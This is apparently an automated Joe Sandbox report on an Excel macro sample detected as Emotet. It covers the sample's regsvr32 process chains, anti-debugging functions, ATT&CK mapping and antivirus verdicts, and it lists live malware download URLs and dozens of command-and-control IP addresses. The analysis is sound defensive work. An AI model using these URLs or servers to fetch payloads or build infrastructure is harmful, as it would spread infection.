Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001AA52 mov eax, dword ptr fs:[00000030h]	4_2_1001AA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001AA52 mov eax, dword ptr fs:[00000030h]	5_2_1001AA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001AA52 mov eax, dword ptr fs:[00000030h]	6_2_1001AA52

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA59DE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6DA59DE2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA65E3D __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6DA65E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA60B04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6DA60B04

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 186.250.48.5 80

Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe"	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,		3_2_6DA69CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,		3_2_6DA4621B

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA65A1C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_6DA65A1C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA66CC3 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

3_2_6DA66CC3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA3DDD4 GetVersionExA,

3_2_6DA3DDD4

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 4.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.426206883.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.420143508.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.434777664.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.693604509.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	Path Interception	111 Process Injection	131 Masquerading	1 Input Capture	2 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	43 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	122 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Scripting	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Obfuscated Files or Information	Proc Filesystem	2 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	27 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
doc_82555.xlsm	44%	Virustotal		Browse
doc_82555.xlsm	20%	Metadefender		Browse
doc_82555.xlsm	62%	ReversingLabs	Document-Excel.Trojan.Emotet
doc_82555.xlsm	100%	Avira	W97M/Dldr.Emotet.OH

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll	45%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\sei.ocx	45%	ReversingLabs	Win32.Trojan.Nekark
C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)	45%	ReversingLabs	Win32.Trojan.Nekark

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.regsvr32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.regsvr32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.regsvr32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.regsvr32.exe.140000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
6.2.regsvr32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

Source	Detection	Scanner	Label	Link
danialteb.com	8%	Virustotal		Browse
gymsportive.com	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://186.250.48.5/;	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://gymsportive.com/0zwe/pSiUh/	15%	Virustotal		Browse
http://gymsportive.com/0zwe/pSiUh/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://186.250.48.5/	100%	Avira URL Cloud	malware
https://186.250.48.5:80/hODqBouciZtjCAXSu	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://danialteb.com/wp-admin/NqRYgwPERRPoTs/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
danialteb.com	194.5.188.24	true	true	8%, Virustotal, Browse	unknown
gymsportive.com	212.64.200.154	true	false	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gymsportive.com/0zwe/pSiUh/	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://danialteb.com/wp-admin/NqRYgwPERRPoTs/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://186.250.48.5/;	regsvr32.exe, 00000006.00000002.693727434.00000000003A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587174139.00000000003A2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://186.250.48.5/	regsvr32.exe, 00000006.00000002.693727434.00000000003A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587174139.00000000003A2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://186.250.48.5:80/hODqBouciZtjCAXSu	regsvr32.exe, 00000006.00000002.693681225.000000000034F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net0D	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.codeproject.com	regsvr32.exe, 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmp, regsvr32.exe, 00000004.00000002.428460874.000000006DA88000.00000002.00000001.01000000.00000006.sdmp, regsvr32.exe, 00000005.00000002.436416494.000000006DA88000.00000002.00000001.01000000.00000007.sdmp, regsvr32.exe, 00000006.00000002.694332163.000000006DA88000.00000002.00000001.01000000.00000007.sdmp, ouyGhPOm[1].dll.0.dr, sei.ocx.0.dr	false		high
https://secure.comodo.com/CPS0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
198.199.98.78	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
194.9.172.107	unknown	unknown	207992	FEELBFR	true
54.37.106.167	unknown	France	16276	OVHFR	true
59.148.253.194	unknown	Hong Kong	9269	HKBN-AS-APHongKongBroadbandNetworkLtdHK	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
93.104.209.107	unknown	Germany	8767	MNET-ASGermanyDE	true
186.250.48.5	unknown	Brazil	262807	RedfoxTelecomunicacoesLtdaBR	true
168.119.39.118	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
185.184.25.78	unknown	Turkey	209711	MUVHOSTTR	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
217.182.143.207	unknown	France	16276	OVHFR	true
203.153.216.46	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.71.195.104	unknown	Brazil	267642	TTELESLEITETELECOMUNICACOESLTDAMEBR	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
68.183.93.250	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
37.59.209.141	unknown	France	16276	OVHFR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
87.106.97.83	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.168.130.138	unknown	Ukraine	49720	GIGACLOUD-ASUA	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
194.5.188.24	danialteb.com	unknown	60631	PARVASYSTEMIR	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
212.64.200.154	gymsportive.com	Turkey	12599	ATLAS-ASTR	false
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	583250
Start date:	04.03.2022
Start time:	15:22:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	doc_82555.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@9/9@2/41
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 31.9% (good quality ratio 31.1%) Quality average: 76.1% Quality standard deviation: 22.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 95 Number of non-executed functions: 175
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:24:23	API Interceptor	585x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	report 826.xlsm	Get hash	malicious	Browse
	hTNQqMy0Td.dll	Get hash	malicious	Browse
	869TXpqb4f.dll	Get hash	malicious	Browse
	krP5ZmIpPu.dll	Get hash	malicious	Browse
	06B35IEWkg.dll	Get hash	malicious	Browse
	u48pYoEAw7H3TZwM5.dll	Get hash	malicious	Browse
	0ZDFkg4bpp.dll	Get hash	malicious	Browse
	ARf1zOcF9q.dll	Get hash	malicious	Browse
	aViI9SncGF.dll	Get hash	malicious	Browse
	Documentos_3.xlsm	Get hash	malicious	Browse
	CB6TQmjalX.dll	Get hash	malicious	Browse
	3TniglJdYp.dll	Get hash	malicious	Browse
	1A4hn8Wdpp.dll	Get hash	malicious	Browse
	kpeh060Nmx.dll	Get hash	malicious	Browse
	B 32.xlsm	Get hash	malicious	Browse
	eIpdEavsk0.dll	Get hash	malicious	Browse
	8DP8v0Pzyo.dll	Get hash	malicious	Browse
	b7habBwo58.dll	Get hash	malicious	Browse
	CoDjGfBAhe.dll	Get hash	malicious	Browse
	6FV6eZVwhZ.dll	Get hash	malicious	Browse
104.131.62.48	report 826.xlsm	Get hash	malicious	Browse
	hTNQqMy0Td.dll	Get hash	malicious	Browse
	869TXpqb4f.dll	Get hash	malicious	Browse
	krP5ZmIpPu.dll	Get hash	malicious	Browse
	06B35IEWkg.dll	Get hash	malicious	Browse
	u48pYoEAw7H3TZwM5.dll	Get hash	malicious	Browse
	0ZDFkg4bpp.dll	Get hash	malicious	Browse
	ARf1zOcF9q.dll	Get hash	malicious	Browse
	aViI9SncGF.dll	Get hash	malicious	Browse
	Documentos_3.xlsm	Get hash	malicious	Browse
	CB6TQmjalX.dll	Get hash	malicious	Browse
	3TniglJdYp.dll	Get hash	malicious	Browse
	1A4hn8Wdpp.dll	Get hash	malicious	Browse
	kpeh060Nmx.dll	Get hash	malicious	Browse
	B 32.xlsm	Get hash	malicious	Browse
	eIpdEavsk0.dll	Get hash	malicious	Browse
	8DP8v0Pzyo.dll	Get hash	malicious	Browse
	b7habBwo58.dll	Get hash	malicious	Browse
	CoDjGfBAhe.dll	Get hash	malicious	Browse
	6FV6eZVwhZ.dll	Get hash	malicious	Browse
198.199.98.78	report 826.xlsm	Get hash	malicious	Browse
	hTNQqMy0Td.dll	Get hash	malicious	Browse
	869TXpqb4f.dll	Get hash	malicious	Browse
	krP5ZmIpPu.dll	Get hash	malicious	Browse
	06B35IEWkg.dll	Get hash	malicious	Browse
	u48pYoEAw7H3TZwM5.dll	Get hash	malicious	Browse
	0ZDFkg4bpp.dll	Get hash	malicious	Browse
	ARf1zOcF9q.dll	Get hash	malicious	Browse
	aViI9SncGF.dll	Get hash	malicious	Browse
	Documentos_3.xlsm	Get hash	malicious	Browse
	CB6TQmjalX.dll	Get hash	malicious	Browse
	3TniglJdYp.dll	Get hash	malicious	Browse
	1A4hn8Wdpp.dll	Get hash	malicious	Browse
	kpeh060Nmx.dll	Get hash	malicious	Browse
	B 32.xlsm	Get hash	malicious	Browse
	eIpdEavsk0.dll	Get hash	malicious	Browse
	8DP8v0Pzyo.dll	Get hash	malicious	Browse
	b7habBwo58.dll	Get hash	malicious	Browse
	CoDjGfBAhe.dll	Get hash	malicious	Browse
	6FV6eZVwhZ.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gymsportive.com	commenti_19265309.xlsm	Get hash	malicious	Browse	212.64.200.154
	DETAILS-0203.xlsm	Get hash	malicious	Browse	212.64.200.154
	Message-0203.xlsm	Get hash	malicious	Browse	212.64.200.154

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	report 826.xlsm	Get hash	malicious	Browse	66.42.57.149
	hTNQqMy0Td.dll	Get hash	malicious	Browse	66.42.57.149
	FBI.mips	Get hash	malicious	Browse	44.34.99.214
	FBI.arm	Get hash	malicious	Browse	44.34.99.214
	vLWeZUjNsL.exe	Get hash	malicious	Browse	149.28.253.196
	px2LWKtyjh.exe	Get hash	malicious	Browse	149.28.253.196
	869TXpqb4f.dll	Get hash	malicious	Browse	66.42.57.149
	krP5ZmIpPu.dll	Get hash	malicious	Browse	66.42.57.149
	06B35IEWkg.dll	Get hash	malicious	Browse	66.42.57.149
	emotet.dll	Get hash	malicious	Browse	139.180.205.161
	u48pYoEAw7H3TZwM5.dll	Get hash	malicious	Browse	66.42.57.149
	msw3bSaKAyocKUAZ1wPy.dll	Get hash	malicious	Browse	139.180.205.161
	ad928db.exe	Get hash	malicious	Browse	45.77.212.132
	OpVkpfXT7v.exe	Get hash	malicious	Browse	104.156.229.140
	0ZDFkg4bpp.dll	Get hash	malicious	Browse	66.42.57.149
	ARf1zOcF9q.dll	Get hash	malicious	Browse	66.42.57.149
	aViI9SncGF.dll	Get hash	malicious	Browse	66.42.57.149
	98RoYzmzFV.exe	Get hash	malicious	Browse	104.156.229.140
	ukzn84cP46.exe	Get hash	malicious	Browse	104.156.229.140
	Scan 2022.03.03_1340.xlsm	Get hash	malicious	Browse	139.180.205.161
DIGITALOCEAN-ASNUS	2022-03-03_1406.xlsm	Get hash	malicious	Browse	178.128.83.165
	PO #0545TF2124434364_docx.exe	Get hash	malicious	Browse	164.90.194.235
	report 826.xlsm	Get hash	malicious	Browse	128.199.192.135
	hTNQqMy0Td.dll	Get hash	malicious	Browse	128.199.192.135
	OvijLY4CSU.dll	Get hash	malicious	Browse	178.128.83.165
	egcewwxkSa.dll	Get hash	malicious	Browse	178.128.83.165
	FBI.i686	Get hash	malicious	Browse	164.90.128.46
	qVNOOT1eoM.dll	Get hash	malicious	Browse	178.128.83.165
	8KNEYd1biC.exe	Get hash	malicious	Browse	164.90.194.235
	seaQvSQqu2.dll	Get hash	malicious	Browse	178.128.83.165
	UFFtdP4QAv	Get hash	malicious	Browse	134.209.44.104
	PO #0545TF2124434364_docx.exe	Get hash	malicious	Browse	164.90.194.235
	Rechnungs-Details 2022.04.03_0805.xlsm	Get hash	malicious	Browse	178.128.83.165
	u21bTh8ueW.exe	Get hash	malicious	Browse	164.90.194.235
	wTEo6o1BMF.exe	Get hash	malicious	Browse	164.90.194.235
	9IcV2IpL0I.exe	Get hash	malicious	Browse	164.90.194.235
	E6swhdTQMZ.exe	Get hash	malicious	Browse	164.90.194.235
	jonathan@wr-it.net.html	Get hash	malicious	Browse	142.93.38.81
	RFQ7943977.exe	Get hash	malicious	Browse	164.90.230.123
	Payment details.xlsm	Get hash	malicious	Browse	178.128.83.165

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 60992 bytes, 1 file
Category:	dropped
Size (bytes):	60992
Entropy (8bit):	7.994637486921971
Encrypted:	true
SSDEEP:	1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
MD5:	637481DF32351129E60560D5A5C100B5
SHA1:	A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
SHA-256:	1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
SHA-512:	604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4\|.?....h...7..P~8.\|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D\|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.\|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...\|.....y.(....]~`>... .p..q<..g..i...y..\|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........\|..j.4.H...g.(...^.....w.......\|...#..og)>..t.}.k.G\|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.148062313756473
Encrypted:	false
SSDEEP:	6:kKBhbN+SkQlPlEGYRMY9z+4KlDA3RUeAxf1:MkPlE99SNxAhUekf1
MD5:	BFCC8E88F07691FA5087F6BAFBD4AF16
SHA1:	DDB83C439F312B700C50EC4EE49ED3E61EE7AF0A
SHA-256:	AB9BC3BEF9C34BD1A3652D81AEB3EA286219F097E0F22FB2745B3A0F937283D0
SHA-512:	9B4C45C2630FBB72EE4F205750E08247794E70AEFF0CBC8330B5AC58C218F97DD68B3DD7DC835506D33C6324BCA7A0B7FBBA50FECF0D4F7B8D7FBC8D6A34BACA
